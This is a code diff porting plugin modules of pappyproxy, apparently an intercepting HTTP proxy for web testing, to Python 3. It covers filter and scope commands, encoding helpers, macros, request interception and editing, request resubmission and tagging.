Usage: scope_reset
"""
result = client.get_scope()
if result.is_custom:
print("Proxy is using a custom function to check scope. Cannot set context to scope.")
return
client.context.set_query(result.filter)
def scope_delete(client, args):
"""
Delete the scope so that it contains all request/response pairs
Usage: scope_delete
"""
client.set_scope([])
def scope_list(client, args):
"""
Print the filters that make up the scope
Usage: scope_list
"""
from ..util import print_query
result = client.get_scope()
if result.is_custom:
print("Proxy is using a custom function to check scope")
return
print_query(result.filter)
def list_saved_queries(client, args):
from ..util import print_query
queries = client.all_saved_queries()
print('')
for q in queries:
print(Styles.TABLE_HEADER + q.name + Colors.ENDC)
print_query(q.query)
print('')
def save_query(client, args):
from ..util import print_query
if len(args) != 1:
print("Must give name to save filters as")
return
client.save_query(args[0], client.context.query)
print('')
print(Styles.TABLE_HEADER + args[0] + Colors.ENDC)
print_query(client.context.query)
print('')
def load_query(client, args):
from ..util import print_query
if len(args) != 1:
print("Must give name of query to load")
return
new_query = client.load_query(args[0])
client.context.set_query(new_query)
print('')
print(Styles.TABLE_HEADER + args[0] + Colors.ENDC)
print_query(new_query)
print('')
def delete_query(client, args):
if len(args) != 1:
print("Must give name of filter")
return
client.delete_query(args[0])
# @crochet.wait_for(timeout=None)
# @defer.inlineCallbacks
# def filter_prune(line):
# """
# Delete all out of context requests from the data file.
# CANNOT BE UNDONE!! Be careful!
# Usage: filter_prune
# """
# # Delete filtered items from datafile
# print ''
# print 'Currently active filters:'
# for f in pappyproxy.pappy.main_context.active_filters:
# print '> %s' % f.filter_string
# # We copy so that we're not removing items from a set we're iterating over
# act_reqs = yield pappyproxy.pappy.main_context.get_reqs()
# inact_reqs = set(Request.cache.req_ids()).difference(set(act_reqs))
# message = 'This will delete %d/%d requests. You can NOT undo this!! Continue?' % (len(inact_reqs), (len(inact_reqs) + len(act_reqs)))
# #print message
# if not confirm(message, 'n'):
# defer.returnValue(None)
# for reqid in inact_reqs:
# try:
# req = yield pappyproxy.http.Request.load_request(reqid)
# yield req.deep_delete()
# except PappyException as e:
# print e
# print 'Deleted %d requests' % len(inact_reqs)
# defer.returnValue(None)
###############
## Plugin hooks
def load_cmds(cmd):
cmd.set_cmds({
#'filter': (filtercmd, complete_filtercmd),
'filter': (filtercmd, None),
'filter_up': (filter_up, None),
'filter_list': (filter_list, None),
'filter_clear': (filter_clear, None),
'scope_list': (scope_list, None),
'scope_delete': (scope_delete, None),
'scope_reset': (scope_reset, None),
'scope_save': (scope_save, None),
'list_saved_queries': (list_saved_queries, None),
# 'filter_prune': (filter_prune, None),
# 'builtin_filter': (builtin_filter, complete_builtin_filter),
'save_query': (save_query, None),
'load_query': (load_query, None),
'delete_query': (delete_query, None),
})
cmd.add_aliases([
('filter', 'f'),
('filter', 'fl'),
('filter_up', 'fu'),
('filter_list', 'fls'),
('filter_clear', 'fc'),
('scope_list', 'sls'),
('scope_reset', 'sr'),
('list_saved_queries', 'sqls'),
# ('builtin_filter', 'fbi'),
('save_query', 'sq'),
('load_query', 'lq'),
('delete_query', 'dq'),
])
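# Example session using the aliases registered above (hostnames and filter
# strings are illustrative):
#
#   pappy> f host ct example.com
#   pappy> f path ct /api OR path ct /admin
#   pappy> fls                  # list the filters making up the context
#   pappy> fu                   # pop the last filter
#   pappy> sq apiscope          # save the current filters as "apiscope"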

View file

@ -1,5 +1,4 @@
import HTMLParser
import StringIO
import html
import base64
import datetime
import gzip
@ -7,31 +6,33 @@ import shlex
import string
import urllib.parse
from pappyproxy.util import PappyException, hexdump, printable_data, copy_to_clipboard, clipboard_contents
from ..util import hexdump, printable_data, copy_to_clipboard, clipboard_contents, encode_basic_auth, parse_basic_auth
from ..console import CommandError
from io import StringIO
def print_maybe_bin(s):
binary = False
for c in s:
if c not in string.printable:
if chr(c) not in string.printable:
binary = True
break
if binary:
print hexdump(s)
print(hexdump(s))
else:
print s
print(s.decode())
def asciihex_encode_helper(s):
return ''.join('{0:x}'.format(ord(c)) for c in s)
return ''.join('{0:x}'.format(c) for c in s).encode()
def asciihex_decode_helper(s):
ret = []
try:
for a, b in zip(s[0::2], s[1::2]):
c = a+b
c = chr(a)+chr(b)
ret.append(chr(int(c, 16)))
return ''.join(ret)
return ''.join(ret).encode()
except Exception as e:
raise PappyException(e)
raise CommandError(e)
def gzip_encode_helper(s):
out = StringIO.StringIO()
@ -54,203 +55,223 @@ def base64_decode_helper(s):
return s_padded
except:
pass
raise PappyException("Unable to base64 decode string")
raise CommandError("Unable to base64 decode string")
def url_decode_helper(s):
bs = s.decode()
return urllib.parse.unquote(bs).encode()
def url_encode_helper(s):
bs = s.decode()
return urllib.parse.quote_plus(bs).encode()
def html_encode_helper(s):
return ''.join(['&#x{0:x};'.format(ord(c)) for c in s])
return ''.join(['&#x{0:x};'.format(c) for c in s]).encode()
def html_decode_helper(s):
return HTMLParser.HTMLParser().unescape(s)
return html.unescape(s.decode()).encode()
def _code_helper(line, func, copy=True):
args = shlex.split(line)
if not args:
s = clipboard_contents()
print 'Will decode:'
print printable_data(s)
def _code_helper(args, func, copy=True):
if len(args) == 0:
s = clipboard_contents().encode()
print('Will decode:')
print(printable_data(s))
s = func(s)
if copy:
try:
copy_to_clipboard(s)
except:
print 'Result cannot be copied to the clipboard. Result not copied.'
except Exception as e:
print('Result cannot be copied to the clipboard. Result not copied.')
raise e
return s
else:
s = func(args[0].strip())
s = func(args[0].encode())
if copy:
try:
copy_to_clipboard(s)
except:
print 'Result cannot be copied to the clipboard. Result not copied.'
except Exception as e:
print('Result cannot be copied to the clipboard. Result not copied.')
raise e
return s
def base64_decode(line):
def base64_decode(client, args):
"""
Base64 decode a string.
If no string is given, will decode the contents of the clipboard.
Results are copied to the clipboard.
"""
print_maybe_bin(_code_helper(line, base64_decode_helper))
print_maybe_bin(_code_helper(args, base64_decode_helper))
def base64_encode(line):
def base64_encode(client, args):
"""
Base64 encode a string.
If no string is given, will encode the contents of the clipboard.
Results are copied to the clipboard.
"""
print_maybe_bin(_code_helper(line, base64.b64encode))
print_maybe_bin(_code_helper(args, base64.b64encode))
def url_decode(line):
def url_decode(client, args):
"""
URL decode a string.
If no string is given, will decode the contents of the clipboard.
Results are copied to the clipboard.
"""
print_maybe_bin(_code_helper(line, urllib.unquote))
print_maybe_bin(_code_helper(args, url_decode_helper))
def url_encode(line):
def url_encode(client, args):
"""
URL encode special characters in a string.
If no string is given, will encode the contents of the clipboard.
Results are copied to the clipboard.
"""
print_maybe_bin(_code_helper(line, urllib.quote_plus))
print_maybe_bin(_code_helper(args, url_encode_helper))
def asciihex_decode(line):
def asciihex_decode(client, args):
"""
Decode an ascii hex string.
If no string is given, will decode the contents of the clipboard.
Results are copied to the clipboard.
"""
print_maybe_bin(_code_helper(line, asciihex_decode_helper))
print_maybe_bin(_code_helper(args, asciihex_decode_helper))
def asciihex_encode(line):
def asciihex_encode(client, args):
"""
Convert all the characters in a line to hex and combine them.
If no string is given, will encode the contents of the clipboard.
Results are copied to the clipboard.
"""
print_maybe_bin(_code_helper(line, asciihex_encode_helper))
print_maybe_bin(_code_helper(args, asciihex_encode_helper))
def html_decode(line):
def html_decode(client, args):
"""
Decode an html encoded string.
If no string is given, will decode the contents of the clipboard.
Results are copied to the clipboard.
"""
print_maybe_bin(_code_helper(line, html_decode_helper))
print_maybe_bin(_code_helper(args, html_decode_helper))
def html_encode(line):
def html_encode(client, args):
"""
Encode a string and escape html control characters.
If no string is given, will encode the contents of the clipboard.
Results are copied to the clipboard.
"""
print_maybe_bin(_code_helper(line, html_encode_helper))
print_maybe_bin(_code_helper(args, html_encode_helper))
def gzip_decode(line):
def gzip_decode(client, args):
"""
Un-gzip a string.
If no string is given, will decompress the contents of the clipboard.
Results are copied to the clipboard.
"""
print_maybe_bin(_code_helper(line, gzip_decode_helper))
print_maybe_bin(_code_helper(args, gzip_decode_helper))
def gzip_encode(line):
def gzip_encode(client, args):
"""
Gzip a string.
If no string is given, will decompress the contents of the clipboard.
Results are NOT copied to the clipboard.
"""
print_maybe_bin(_code_helper(line, gzip_encode_helper, copy=False))
print_maybe_bin(_code_helper(args, gzip_encode_helper, copy=False))
def base64_decode_raw(line):
def base64_decode_raw(client, args):
"""
Same as base64_decode but the output will never be printed as a hex dump and
results will not be copied. It is suggested you redirect the output
to a file.
"""
print _code_helper(line, base64_decode_helper, copy=False)
print(_code_helper(args, base64_decode_helper, copy=False))
def base64_encode_raw(line):
def base64_encode_raw(client, args):
"""
Same as base64_encode but the output will never be printed as a hex dump and
results will not be copied. It is suggested you redirect the output
to a file.
"""
print _code_helper(line, base64.b64encode, copy=False)
print(_code_helper(args, base64.b64encode, copy=False))
def url_decode_raw(line):
def url_decode_raw(client, args):
"""
Same as url_decode but the output will never be printed as a hex dump and
results will not be copied. It is suggested you redirect the output
to a file.
"""
print _code_helper(line, urllib.unquote, copy=False)
print(_code_helper(args, url_decode_helper, copy=False))
def url_encode_raw(line):
def url_encode_raw(client, args):
"""
Same as url_encode but the output will never be printed as a hex dump and
results will not be copied. It is suggested you redirect the output
to a file.
"""
print _code_helper(line, urllib.quote_plus, copy=False)
print(_code_helper(args, url_encode_helper, copy=False))
def asciihex_decode_raw(line):
def asciihex_decode_raw(client, args):
"""
Same as asciihex_decode but the output will never be printed as a hex dump and
results will not be copied. It is suggested you redirect the output
to a file.
"""
print _code_helper(line, asciihex_decode_helper, copy=False)
print(_code_helper(args, asciihex_decode_helper, copy=False))
def asciihex_encode_raw(line):
def asciihex_encode_raw(client, args):
"""
Same as asciihex_encode but the output will never be printed as a hex dump and
results will not be copied. It is suggested you redirect the output
to a file.
"""
print _code_helper(line, asciihex_encode_helper, copy=False)
print(_code_helper(args, asciihex_encode_helper, copy=False))
def html_decode_raw(line):
def html_decode_raw(client, args):
"""
Same as html_decode but the output will never be printed as a hex dump and
results will not be copied. It is suggested you redirect the output
to a file.
"""
print _code_helper(line, html_decode_helper, copy=False)
print(_code_helper(args, html_decode_helper, copy=False))
def html_encode_raw(line):
def html_encode_raw(client, args):
"""
Same as html_encode but the output will never be printed as a hex dump and
results will not be copied. It is suggested you redirect the output
to a file.
"""
print _code_helper(line, html_encode_helper, copy=False)
print(_code_helper(args, html_encode_helper, copy=False))
def gzip_decode_raw(line):
def gzip_decode_raw(client, args):
"""
Same as gzip_decode but the output will never be printed as a hex dump and
results will not be copied. It is suggested you redirect the output
to a file.
"""
print _code_helper(line, gzip_decode_helper, copy=False)
print(_code_helper(args, gzip_decode_helper, copy=False))
def gzip_encode_raw(line):
def gzip_encode_raw(client, args):
"""
Same as gzip_encode but the output will never be printed as a hex dump and
results will not be copied. It is suggested you redirect the output
to a file.
"""
print _code_helper(line, gzip_encode_helper, copy=False)
print(_code_helper(args, gzip_encode_helper, copy=False))
def unix_time_decode_helper(line):
unix_time = int(line.strip())
dtime = datetime.datetime.fromtimestamp(unix_time)
return dtime.strftime('%Y-%m-%d %H:%M:%S')
def unix_time_decode(line):
print _code_helper(line, unix_time_decode_helper)
def unix_time_decode(client, args):
print(_code_helper(args, unix_time_decode_helper))
def http_auth_encode(client, args):
if len(args) != 2:
raise CommandError('Usage: http_auth_encode <username> <password>')
username, password = args
print(encode_basic_auth(username, password))
def http_auth_decode(client, args):
username, password = parse_basic_auth(args[0])
print(username)
print(password)
def load_cmds(cmd):
cmd.set_cmds({
@ -275,6 +296,8 @@ def load_cmds(cmd):
'gzip_decode_raw': (gzip_decode_raw, None),
'gzip_encode_raw': (gzip_encode_raw, None),
'unixtime_decode': (unix_time_decode, None),
'httpauth_encode': (http_auth_encode, None),
'httpauth_decode': (http_auth_decode, None)
})
cmd.add_aliases([
('base64_decode', 'b64d'),
@ -298,4 +321,6 @@ def load_cmds(cmd):
('gzip_decode_raw', 'gzdr'),
('gzip_encode_raw', 'gzer'),
('unixtime_decode', 'uxtd'),
('httpauth_encode', 'hae'),
('httpauth_decode', 'had'),
])
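# Example session (assuming encode_basic_auth produces the usual
# "Basic <base64>" header value):
#
#   pappy> hae admin hunter2
#   Basic YWRtaW46aHVudGVyMg==
#   pappy> b64d YWRtaW46aHVudGVyMg==
#   admin:hunter2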

View file

@ -0,0 +1,150 @@
from ..util import load_reqlist
from ..macros import macro_from_requests, MacroTemplate, load_macros
from ..colors import Colors
macro_dict = {}
int_macro_dict = {}
int_conns = {}
def generate_macro(client, args):
if len(args) == 0:
print("usage: gma [name] [reqids]")
return
macro_name = args[0]
reqs = [r for r in load_reqlist(client, ','.join(args[1:]))]
script_string = macro_from_requests(reqs)
fname = MacroTemplate.template_filename('macro', macro_name)
with open(fname, 'w') as f:
f.write(script_string)
print("Macro written to {}".format(fname))
def generate_int_macro(client, args):
if len(args) == 0:
print("usage: gima [name] [reqids]")
return
macro_name = args[0]
reqs = [r for r in load_reqlist(client, ','.join(args[1:]))]
script_string = macro_from_requests(reqs, template='intmacro')
fname = MacroTemplate.template_filename('intmacro', macro_name)
with open(fname, 'w') as f:
f.write(script_string)
print("Macro written to {}".format(fname))
def load_macros_cmd(client, args):
global macro_dict
load_dir = '.'
if len(args) > 0:
load_dir = args[0]
_stop_all_int_macros()
loaded_macros, loaded_int_macros = load_macros(load_dir, client)
for macro in loaded_macros:
macro_dict[macro.name] = macro
print("Loaded {} ({})".format(macro.name, macro.file_name))
for macro in loaded_int_macros:
int_macro_dict[macro.name] = macro
print("Loaded {} ({})".format(macro.name, macro.file_name))
def complete_run_macro(text, line, begidx, endidx):
from ..util import autocomplete_startswith
global macro_dict
strs = macro_dict.keys()
return autocomplete_startswith(text, strs)
def run_macro(client, args):
global macro_dict
if len(args) == 0:
print("usage: rma [macro name]")
return
macro = macro_dict[args[0]]
macro.execute(client, args[1:])
def complete_run_int_macro(text, line, begidx, endidx):
from ..util import autocomplete_startswith
global int_macro_dict
strs = int_macro_dict.keys()
return autocomplete_startswith(text, strs)
def run_int_macro(client, args):
global int_macro_dict
global int_conns
if len(args) == 0:
print("usage: rim [macro name]")
return
if args[0] in int_conns:
print("%s is already running!" % args[0])
return
macro = int_macro_dict[args[0]]
macro.init(args[1:])
conn = client.new_conn()
int_conns[args[0]] = conn
conn.intercept(macro)
print("Started %s" % args[0])
def complete_stop_int_macro(text, line, begidx, endidx):
from ..util import autocomplete_startswith
global int_conns
strs = int_conns.keys()
return autocomplete_startswith(text, strs)
def stop_int_macro(client, args):
global int_conns
if len(args) > 0:
conn = int_conns[args[0]]
conn.close()
del int_conns[args[0]]
print("Stopped %s" % args[0])
else:
_stop_all_int_macros()
def _stop_all_int_macros():
global int_conns
# iterate over a copy since we delete entries as we go
for k, conn in list(int_conns.items()):
conn.close()
del int_conns[k]
print("Stopped %s" % k)
def list_macros(client, args):
global macro_dict
global int_macro_dict
global int_conns
if len(macro_dict) > 0:
print('Loaded Macros:')
for k, m in macro_dict.items():
print(' '+k)
if len(int_macro_dict) > 0:
print('Loaded Intercepting Macros:')
for k, m in int_macro_dict.items():
pstr = ' '+k
if k in int_conns:
pstr += ' (' + Colors.GREEN + 'RUNNING' + Colors.ENDC + ')'
print(pstr)
def load_cmds(cmd):
cmd.set_cmds({
'generate_macro': (generate_macro, None),
'generate_int_macro': (generate_int_macro, None),
'load_macros': (load_macros_cmd, None),
'run_macro': (run_macro, complete_run_macro),
'run_int_macro': (run_int_macro, complete_run_int_macro),
'stop_int_macro': (stop_int_macro, complete_stop_int_macro),
'list_macros': (list_macros, None),
})
cmd.add_aliases([
('generate_macro', 'gma'),
('generate_int_macro', 'gima'),
('load_macros', 'lma'),
('run_macro', 'rma'),
('run_int_macro', 'rim'),
('stop_int_macro', 'sim'),
('list_macros', 'lsma'),
])
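# Typical workflow (the generated filename comes from
# MacroTemplate.template_filename, so the exact name may differ):
#
#   pappy> gma login 12,13,14   # generate a macro from requests 12-14
#   pappy> lma                  # load macros from the current directory
#   Loaded login (macro_login.py)
#   pappy> rma login            # run it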

View file

@ -0,0 +1,325 @@
import curses
import os
import subprocess
import tempfile
import threading
from ..macros import InterceptMacro
from ..proxy import MessageError, parse_request, parse_response
from ..colors import url_formatter
edit_queue = []
class InterceptorMacro(InterceptMacro):
"""
A class representing a macro that modifies requests as they pass through the
proxy
"""
def __init__(self):
InterceptMacro.__init__(self)
self.name = "InterceptorMacro"
def mangle_request(self, request):
# This function gets called to mangle/edit requests passed through the proxy
# Write original request to the temp file
with tempfile.NamedTemporaryFile(delete=False) as tf:
tfName = tf.name
tf.write(request.full_message())
mangled_req = request
front = False
while True:
# Have the console edit the file
event = edit_file(tfName, front=front)
event.wait()
if event.canceled:
return request
# Create new mangled request from edited file
with open(tfName, 'rb') as f:
text = f.read()
os.remove(tfName)
# Check if dropped
if not text:
return None
try:
mangled_req = parse_request(text)
except MessageError as e:
print("could not parse request: %s" % str(e))
front = True
continue
mangled_req.dest_host = request.dest_host
mangled_req.dest_port = request.dest_port
mangled_req.use_tls = request.use_tls
break
return mangled_req
def mangle_response(self, request, response):
# This function gets called to mangle/edit responses passed through the proxy
# Write original response to the temp file
with tempfile.NamedTemporaryFile(delete=False) as tf:
tfName = tf.name
tf.write(response.full_message())
mangled_rsp = response
while True:
# Have the console edit the file
event = edit_file(tfName, front=True)
event.wait()
if event.canceled:
return response
# Create new mangled response from edited file
with open(tfName, 'rb') as f:
text = f.read()
os.remove(tfName)
# Check if dropped
if not text:
return None
try:
mangled_rsp = parse_response(text)
except MessageError as e:
print("could not parse response: %s" % str(e))
front = True
continue
break
return mangled_rsp
def mangle_websocket(self, request, response, message):
# This function gets called to mangle/edit websocket messages passed through the proxy
# Write original response to the temp file
with tempfile.NamedTemporaryFile(delete=False) as tf:
tfName = tf.name
tf.write(b"# ")
if message.to_server:
tf.write(b"OUTGOING to")
else:
tf.write(b"INCOMING from")
desturl = 'ws' + url_formatter(request)[4:] # replace http:// with ws://
tf.write(b' ' + desturl.encode())
tf.write(b" -- Note that this line is ignored\n")
tf.write(message.message)
mangled_msg = message
while True:
# Have the console edit the file
event = edit_file(tfName, front=True)
event.wait()
if event.canceled:
return message
# Create new mangled response from edited file
with open(tfName, 'rb') as f:
text = f.read()
_, text = text.split(b'\n', 1)
os.remove(tfName)
# Check if dropped
if not text:
return None
mangled_msg.message = text
# if messages can be invalid, check for it here and continue if invalid
break
return mangled_msg
class EditEvent:
def __init__(self):
self.e = threading.Event()
self.canceled = False
def wait(self):
self.e.wait()
def set(self):
self.e.set()
def cancel(self):
self.canceled = True
self.set()
###############
## Helper funcs
def edit_file(fname, front=False):
global edit_queue
# Adds the filename to the edit queue. Returns an event that is set once
# the file is edited and the editor is closed
#e = threading.Event()
e = EditEvent()
if front:
edit_queue = [(fname, e, threading.current_thread())] + edit_queue
else:
edit_queue.append((fname, e, threading.current_thread()))
return e
def execute_repeater(client, reqid):
#script_loc = os.path.join(pappy.session.config.pappy_dir, "plugins", "vim_repeater", "repeater.vim")
maddr = client.maddr
if maddr is None:
print("Client has no message address, cannot run repeater")
return
storage, reqid = client.parse_reqid(reqid)
script_loc = os.path.join(os.path.dirname(os.path.realpath(__file__)),
"repeater", "repeater.vim")
args = (["vim", "-S", script_loc, "-c", "RepeaterSetup %s %s %s"%(reqid, storage.storage_id, client.maddr)])
subprocess.call(args)
class CloudToButt(InterceptMacro):
def __init__(self):
InterceptMacro.__init__(self)
self.name = 'cloudtobutt'
self.intercept_requests = True
self.intercept_responses = True
self.intercept_ws = True
def mangle_response(self, request, response):
response.body = response.body.replace(b"cloud", b"butt")
response.body = response.body.replace(b"Cloud", b"Butt")
return response
def mangle_request(self, request):
request.body = request.body.replace(b"foo", b"bar")
request.body = request.body.replace(b"Foo", b"Bar")
return request
def mangle_websocket(self, request, response, wsm):
wsm.message = wsm.message.replace(b"world", b"zawarudo")
wsm.message = wsm.message.replace(b"zawarudo", b"ZAWARUDO")
return wsm
def repeater(client, args):
"""
Open a request in the repeater
Usage: repeater <reqid>
"""
# This is not async on purpose. start_editor acts up if this is called
# with inline callbacks. As a result, check_reqid and get_unmangled
# cannot be async
reqid = args[0]
req = client.req_by_id(reqid)
execute_repeater(client, reqid)
def intercept(client, args):
"""
Intercept requests and/or responses and edit them before passing them along
Usage: intercept <reqid>
"""
global edit_queue
req_names = ('req', 'request', 'requests')
rsp_names = ('rsp', 'response', 'responses')
ws_names = ('ws', 'websocket')
mangle_macro = InterceptorMacro()
if any(a in req_names for a in args):
mangle_macro.intercept_requests = True
if any(a in rsp_names for a in args):
mangle_macro.intercept_responses = True
if any(a in ws_names for a in args):
mangle_macro.intercept_ws = True
if not args:
mangle_macro.intercept_requests = True
intercepting = []
if mangle_macro.intercept_requests:
intercepting.append('Requests')
if mangle_macro.intercept_responses:
intercepting.append('Responses')
if mangle_macro.intercept_ws:
intercepting.append('Websocket Messages')
if not mangle_macro.intercept_requests and not mangle_macro.intercept_responses and not mangle_macro.intercept_ws:
intercept_str = 'NOTHING WHY ARE YOU DOING THIS' # WHYYYYYYYY
else:
intercept_str = ', '.join(intercepting)
## Interceptor loop
stdscr = curses.initscr()
curses.noecho()
curses.cbreak()
stdscr.nodelay(True)
conn = client.new_conn()
try:
conn.intercept(mangle_macro)
editnext = False
while True:
stdscr.addstr(0, 0, "Currently intercepting: %s" % intercept_str)
stdscr.clrtoeol()
stdscr.addstr(1, 0, "%d item(s) in queue." % len(edit_queue))
stdscr.clrtoeol()
if editnext:
stdscr.addstr(2, 0, "Waiting for next item... Press 'q' to quit or 'b' to quit waiting")
else:
stdscr.addstr(2, 0, "Press 'n' to edit the next item or 'q' to quit interceptor.")
stdscr.clrtoeol()
c = stdscr.getch()
if c == ord('q'):
return
elif c == ord('n'):
editnext = True
elif c == ord('b'):
editnext = False
if editnext and edit_queue:
editnext = False
(to_edit, event, t) = edit_queue.pop(0)
editor = 'vi'
if 'EDITOR' in os.environ:
editor = os.environ['EDITOR']
additional_args = []
if editor == 'vim':
# prevent adding additional newline
additional_args.append('-b')
subprocess.call([editor, to_edit] + additional_args)
stdscr.clear()
event.set()
t.join()
finally:
conn.close()
# Now that the connection is closed, make sure the rest of the threads finish/error out
while len(edit_queue) > 0:
(fname, event, t) = edit_queue.pop(0)
event.cancel()
t.join()
curses.nocbreak()
stdscr.keypad(0)
curses.echo()
curses.endwin()
###############
## Plugin hooks
def test_macro(client, args):
c2b = CloudToButt()
with client.new_conn() as conn:
conn.intercept(c2b)
print("intercept started")
input("Press enter to quit...")
print("past raw input")
def load_cmds(cmd):
cmd.set_cmds({
'intercept': (intercept, None),
'c2b': (test_macro, None),
'repeater': (repeater, None),
})
cmd.add_aliases([
('intercept', 'ic'),
('repeater', 'rp'),
])
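# Example session: intercept requests and responses (edited in $EDITOR,
# falling back to vi), then open a request in the vim repeater:
#
#   pappy> ic req rsp
#   pappy> rp 12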

View file

@ -0,0 +1,187 @@
import argparse
import sys
import tempfile
import subprocess
from ..util import copy_to_clipboard, confirm, printable_data, Capturing, load_reqlist
from ..console import CommandError
from ..proxy import InterceptMacro
from ..colors import url_formatter, verb_color, Colors, scode_color
class WatchMacro(InterceptMacro):
def __init__(self, client):
InterceptMacro.__init__(self)
self.name = "WatchMacro"
self.client = client
def mangle_request(self, request):
if self.client.is_in_context(request):
printstr = "> "
printstr += verb_color(request.method) + request.method + Colors.ENDC + " "
printstr += url_formatter(request, colored=True)
print(printstr)
return request
def mangle_response(self, request, response):
if self.client.is_in_context(request):
printstr = "< "
printstr += verb_color(request.method) + request.method + Colors.ENDC + ' '
printstr += url_formatter(request, colored=True)
printstr += " \u2192 "
response_code = str(response.status_code) + ' ' + response.reason
response_code = scode_color(response_code) + response_code + Colors.ENDC
printstr += response_code
print(printstr)
return response
def mangle_websocket(self, request, response, message):
if self.client.is_in_context(request):
printstr = ""
if message.to_server:
printstr += ">"
else:
printstr += "<"
printstr += "ws(b={}) ".format(message.is_binary)
printstr += printable_data(message.message)
print(printstr)
return message
def message_address(client, args):
msg_addr = client.maddr
if msg_addr is None:
print("Client has no message address")
return
print(msg_addr)
if len(args) > 0 and args[0] == "-c":
try:
copy_to_clipboard(msg_addr.encode())
print("Copied to clipboard!")
except:
print("Could not copy address to clipboard")
def ping(client, args):
print(client.ping())
def watch(client, args):
macro = WatchMacro(client)
macro.intercept_requests = True
macro.intercept_responses = True
macro.intercept_ws = True
with client.new_conn() as conn:
conn.intercept(macro)
print("Watching requests. Press <Enter> to quit...")
input()
def submit(client, cargs):
"""
Resubmit some requests, optionally with modified headers and cookies.
Usage: submit <reqid(s)> [-h] [-m] [-u] [-p] [-o REQID] [-c [COOKIES [COOKIES ...]]] [-d [HEADERS [HEADERS ...]]]
"""
#Usage: submit reqids [-h] [-m] [-u] [-p] [-o REQID] [-c [COOKIES [COOKIES ...]]] [-d [HEADERS [HEADERS ...]]]
if len(cargs) == 0:
raise CommandError("Missing request id(s)")
parser = argparse.ArgumentParser(prog="submit", usage=submit.__doc__)
#parser.add_argument('reqids')
parser.add_argument('-m', '--inmem', action='store_true', help='Store resubmitted requests in memory without storing them in the data file')
parser.add_argument('-u', '--unique', action='store_true', help='Only resubmit one request per endpoint (different URL parameters are different endpoints)')
parser.add_argument('-p', '--uniquepath', action='store_true', help='Only resubmit one request per endpoint (ignoring URL parameters)')
parser.add_argument('-c', '--cookies', nargs='*', help='Apply a cookie to requests before submitting')
parser.add_argument('-d', '--headers', nargs='*', help='Apply a header to requests before submitting')
parser.add_argument('-o', '--copycookies', help='Copy the cookies used in another request')
reqids = cargs[0]
args = parser.parse_args(cargs[1:])
headers = {}
cookies = {}
clear_cookies = False
if args.headers:
for h in args.headers:
k, v = h.split('=', 1)
headers[k] = v
if args.copycookies:
reqid = args.copycookies
req = client.req_by_id(reqid)
clear_cookies = True
for k, v in req.cookie_iter():
cookies[k] = v
if args.cookies:
for c in args.cookies:
k, v = c.split('=', 1)
cookies[k] = v
if args.unique and args.uniquepath:
raise CommandError('Both -u and -p cannot be given as arguments')
# Get requests to submit
#reqs = [r.copy() for r in client.in_context_requests()]
reqs = [r for r in load_reqlist(client, reqids)]
# Apply cookies and headers
for req in reqs:
if clear_cookies:
req.headers.delete("Cookie")
for k, v in cookies.items():
req.set_cookie(k, v)
for k, v in headers.items():
req.headers.set(k, v)
conf_message = "You're about to submit %d requests, continue?" % len(reqs)
if not confirm(conf_message):
return
# Filter unique paths
if args.uniquepath or args.unique:
endpoints = set()
new_reqs = []
for r in reqs:
if args.unique:
s = r.url.geturl()
else:
s = r.url.geturl(include_params=False)
if not s in endpoints:
new_reqs.append(r)
endpoints.add(s)
reqs = new_reqs
# Tag and send them
for req in reqs:
req.tags.add('resubmitted')
sys.stdout.write(client.get_reqid(req) + " ")
sys.stdout.flush()
storage = client.disk_storage.storage_id
if args.inmem:
storage = client.inmem_storage.storage_id
client.submit(req, storage=storage)
sys.stdout.write("\n")
sys.stdout.flush()
def run_with_less(client, args):
with Capturing() as output:
client.console.run_args(args)
with tempfile.NamedTemporaryFile() as tf:
tf.write(output.val.encode())
tf.flush()
subprocess.call(['less', '-R', tf.name])
def load_cmds(cmd):
cmd.set_cmds({
'maddr': (message_address, None),
'ping': (ping, None),
'submit': (submit, None),
'watch': (watch, None),
'less': (run_with_less, None),
})
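# Example session (header and cookie values are illustrative):
#
#   pappy> watch                          # print traffic as it passes through
#   pappy> submit 12,13 -u -d X-Debug=1   # resubmit with an extra header
#   pappy> submit 14 -o 20 -m             # reuse request 20's cookies, keep in memory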

File diff suppressed because it is too large

View file

@ -0,0 +1,64 @@
from ..console import CommandError
from ..util import confirm, load_reqlist
def tag_cmd(client, args):
if len(args) == 0:
raise CommandError("Usage: tag <tag> [reqid1] [reqid2] ...")
if not args[0]:
raise CommandError("Tag cannot be empty")
tag = args[0]
if len(args) == 1:
reqids = '*'
else:
reqids = ','.join(args[1:])
reqs = [r for r in load_reqlist(client, reqids, headers_only=True)]
if len(reqs) > 10:
cnt = confirm("You are about to tag {} requests with \"{}\". Continue?".format(len(reqs), tag))
if not cnt:
return
for reqh in reqs:
reqid = client.get_reqid(reqh)
client.add_tag(reqid, tag)
def untag_cmd(client, args):
if len(args) == 0:
raise CommandError("Usage: untag <tag> [reqid1] [reqid2] ...")
if not args[0]:
raise CommandError("Tag cannot be empty")
tag = args[0]
if len(args) == 1:
reqids = '*'
else:
reqids = ','.join(args[1:])
reqs = [r for r in load_reqlist(client, reqids, headers_only=True)]
if len(reqs) > 10:
cnt = confirm("You are about to remove the \"{}\" tag from {} requests. Continue?".format(tag, len(reqs)))
if not cnt:
return
for reqh in reqs:
reqid = client.get_reqid(reqh)
client.remove_tag(reqid, tag)
def clrtag_cmd(client, args):
if len(args) == 0:
raise CommandError("Usage: clrtag [reqid1] [reqid2] ...")
reqids = ','.join(args)
reqs = [r for r in load_reqlist(client, reqids, headers_only=True)]
if len(reqs) > 5:
cnt = confirm("You are about to clear ALL TAGS from {} requests. Continue?".format(len(reqs)))
if not cnt:
return
for reqh in reqs:
reqid = client.get_reqid(reqh)
client.clear_tag(reqid)
def load_cmds(cmd):
cmd.set_cmds({
'clrtag': (clrtag_cmd, None),
'untag': (untag_cmd, None),
'tag': (tag_cmd, None),
})
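# Example session:
#
#   pappy> tag checked 12,13   # tag requests 12 and 13
#   pappy> untag checked 12    # remove the tag from request 12
#   pappy> clrtag 13           # clear every tag on request 13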

View file

@ -0,0 +1,7 @@
def test_cmd(client, args):
print("args:", ', '.join(args))
print("ping:", client.ping())
def load_cmds(cons):
cons.set_cmd("test", test_cmd)

View file

@ -0,0 +1,741 @@
import datetime
import json
import pygments
import pprint
import re
import shlex
import urllib
from ..util import print_table, print_request_rows, get_req_data_row, datetime_string, maybe_hexdump, load_reqlist
from ..colors import Colors, Styles, verb_color, scode_color, path_formatter, color_string, url_formatter, pretty_msg, pretty_headers
from ..console import CommandError
from pygments.formatters import TerminalFormatter
from pygments.lexers.data import JsonLexer
from pygments.lexers.html import XmlLexer
